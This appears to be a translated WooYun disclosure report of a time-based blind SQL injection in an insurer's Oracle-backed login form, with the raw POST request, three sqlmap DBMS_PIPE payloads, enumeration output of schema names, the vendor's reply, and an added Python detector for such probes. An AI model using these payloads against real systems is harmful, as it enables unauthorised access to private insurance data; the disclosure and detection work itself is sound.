
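Vulnerability summary

Bug ID: wooyun-2015-0157014

Title: POST injection in an important system of 新光海航人寿 (Oracle)

Vendor: 新光海航人寿

Author: 路人甲

Submitted: 2015-12-04 17:40

Fixed: 2016-01-18 11:32

Published: 2016-01-18 11:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org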



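Vulnerability details

Disclosure status:

2015-12-04: details reported to the vendor, awaiting vendor handling
2015-12-08: vendor confirmed; details disclosed to the vendor only
2015-12-18: details disclosed to core white hats and experts in related fields
2015-12-28: details disclosed to regular white hats
2016-01-07: details disclosed to intern white hats
2016-01-18: details disclosed to the public

Brief description:

Detailed description:

Address:

http://**.**.**.**:8088/SKLSUG/indexlis.jsp


POST request used for the time-based blind injection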

POST /SKLSUG/fromLogin/fromLoginSave.jsp HTTP/1.1
Host: **.**.**.**:8088
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:8088/SKLSUG/fromLogin/manageLogin.jsp
Cookie: JSESSIONID=782FF9898F583F1E49892D45CE9E0088
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

channel=I&usertype=1&managecom=00603&subcom=&supportcom=0060301&usercode=test&password=test


Data

Place: POST
Parameter: usercode
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: channel=I&usertype=1&managecom=124124&subcom=&supportcom=1234134124
&usercode=admin' AND 6285=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(78)||CHR(68)||
CHR(100),5) AND 'JBBc'='JBBc&password=admin
Place: POST
Parameter: supportcom
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: channel=I&usertype=1&managecom=124124&subcom=&supportcom=1234134124
' AND 7417=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(120)||CHR(122)||CHR(121),5) A
ND 'JCVP'='JCVP&usercode=admin&password=admin
Place: POST
Parameter: usertype
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: channel=I&usertype=1' AND 8434=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||C
HR(75)||CHR(102)||CHR(87),5) AND 'NPme'='NPme&managecom=124124&subcom=&supportco
m=1234134124&usercode=admin&password=admin
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: POST, parameter: usertype, type: Single quoted string (default)
[1] place: POST, parameter: supportcom, type: Single quoted string
[2] place: POST, parameter: usercode, type: Single quoted string
[q] Quit
>
[11:52:26] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[11:52:26] [INFO] fetching current user
[11:52:26] [INFO] retrieved:
[11:52:26] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
SK
[11:53:09] [INFO] adjusting time delay to 3 seconds due to good response times
L
[11:53:21] [INFO] adjusting time delay to 2 seconds due to good response times
SUGPROD
current user: 'SKLSUGPROD'


available databases [1]:
[*] SKLSUGPROD


More than 20 tables. I originally wanted to dump the users, but it turned out to be too slow; it ran for over an hour.

[11:57:32] [INFO] adjusting time delay to 2 seconds due to
20
[11:57:37] [INFO] retrieved: CF
[11:58:06] [INFO] retrieved: CTXSYS
[11:59:35] [INFO] retrieved: DBS
[12:00:25] [ERROR] invalid character detected. retrying..
[12:00:25] [WARNING] increasing time delay to 3 seconds
[12:00:46] [ERROR] invalid character detected. retrying..
[12:00:46] [WARNING] increasing time delay to 4 seconds
[12:01:03] [ERROR] invalid character detected. retrying..
[12:01:03] [WARNING] increasing time delay to 5 seconds
N
[12:02:00] [ERROR] invalid character detected. retrying..
[12:02:00] [WARNING] increasing time delay to 6 seconds
M
[12:02:46] [ERROR] invalid character detected. retrying..
[12:02:46] [WARNING] increasing time delay to 7 seconds
[12:03:09] [ERROR] unable to properly validate last charact
a
[12:03:14] [INFO] retrieved: DMSYS
[12:04:18] [INFO] retrieved: ECDEV
[12:05:19] [INFO] retrieved:
[12:05:30] [ERROR] invalid character detected. retrying..
[12:05:30] [WARNING] increasing time delay to 3 seconds
[12:05:45] [ERROR] invalid character detected. retrying..
[12:05:45] [WARNING] increasing time delay to 4 seconds
[12:06:03] [ERROR] invalid character detected. retrying..
[12:06:03] [WARNING] increasing time delay to 5 seconds
EXFSYS
[12:08:42] [INFO] retrieved: MDS
[12:10:11] [ERROR] invalid character detected. retrying..
[12:10:11] [WARNING] increasing time delay to 6 seconds
YS
[12:11:10] [INFO] retrieved: OLAPSYS
[12:14:22] [INFO] retrieved: ORDSYS
[12:16:59] [INFO] retrieved: OUTLN
[12:19:29] [INFO] retrieved: SCOT
[12:21:43] [ERROR] invalid character detected. retrying..
[12:21:43] [WARNING] increasing time delay to 7 seconds
T
[12:22:34] [INFO] retrieved: S
[12:23:34] [ERROR] unable to properly validate last charact
QLSU


It only got this far.

Proof of vulnerability:

Fix:

Copyright notice: when reposting, please credit the source 路人甲@乌云
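
Added example, not part of the original report: a log-review check that flags form fields carrying the DBMS_PIPE.RECEIVE_MESSAGE delay probe shown in the sqlmap output and separates probes that were only attempted from ones whose delay showed up in the response time. It assumes access logs that record the urlencoded POST body and the response time; the function names, sample records and timings are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# DBMS_PIPE.RECEIVE_MESSAGE(name, timeout) blocks for `timeout` seconds on an
# empty pipe; the time-based payloads in the report depend on that delay.
DELAY_CALL = re.compile(
    r"DBMS_PIPE\s*\.\s*RECEIVE_MESSAGE\s*\(.*?,\s*(\d+)\s*\)", re.I | re.S)
# A quote followed by AND/OR: the value closes the SQL string literal it sits in.
QUOTE_BREAKOUT = re.compile(r"'\s*(?:AND|OR)\b", re.I)


def inspect_body(body):
    """Return {field: requested delay in seconds} for fields carrying a probe."""
    hits = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        call = DELAY_CALL.search(value)
        if call and QUOTE_BREAKOUT.search(value):
            hits[name] = int(call.group(1))
    return hits


def classify(body, elapsed_seconds):
    """'clean', 'attempt' (probe, no delay seen) or 'executed' (delay seen)."""
    hits = inspect_body(body)
    if not hits:
        return "clean", hits
    if elapsed_seconds >= min(hits.values()):
        return "executed", hits
    return "attempt", hits


# Constructed records: (urlencoded POST body, response time in seconds).
# Field names and payload shape follow the report; the timings are invented.
SAMPLES = [
    ("channel=I&usertype=1&managecom=00603&subcom=&supportcom=0060301"
     "&usercode=test&password=test", 0.12),
    ("channel=I&usertype=1&managecom=124124&subcom=&supportcom=1234134124"
     "&usercode=admin%27+AND+6285%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29"
     "%7C%7CCHR%2878%29%7C%7CCHR%2868%29%7C%7CCHR%28100%29%2C5%29"
     "+AND+%27JBBc%27%3D%27JBBc&password=admin", 5.31),
    ("channel=I&usertype=1%27+AND+8434%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2880%29"
     "%7C%7CCHR%2875%29%7C%7CCHR%28102%29%7C%7CCHR%2887%29%2C5%29"
     "+AND+%27NPme%27%3D%27NPme&managecom=124124&subcom=&supportcom=1234134124"
     "&usercode=admin&password=admin", 0.18),
]

if __name__ == "__main__":
    for body, elapsed in SAMPLES:
        verdict, hits = classify(body, elapsed)
        print(f"{elapsed:5.2f}s  {verdict:8}  {hits}")
```

A slow but benign response can also reach the threshold, so treat "executed" as a lead to confirm against database-side evidence. Detection does not remove the flaw; the three flagged fields still need to be passed to Oracle as bind variables.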


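Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-12-08 12:38

Vendor reply:

CNVD confirmed and reproduced the reported issue and has passed it via CNCERT to the authority responsible for IT in the insurance industry, which will coordinate follow-up handling with the organization operating the site.

Latest status:

None yet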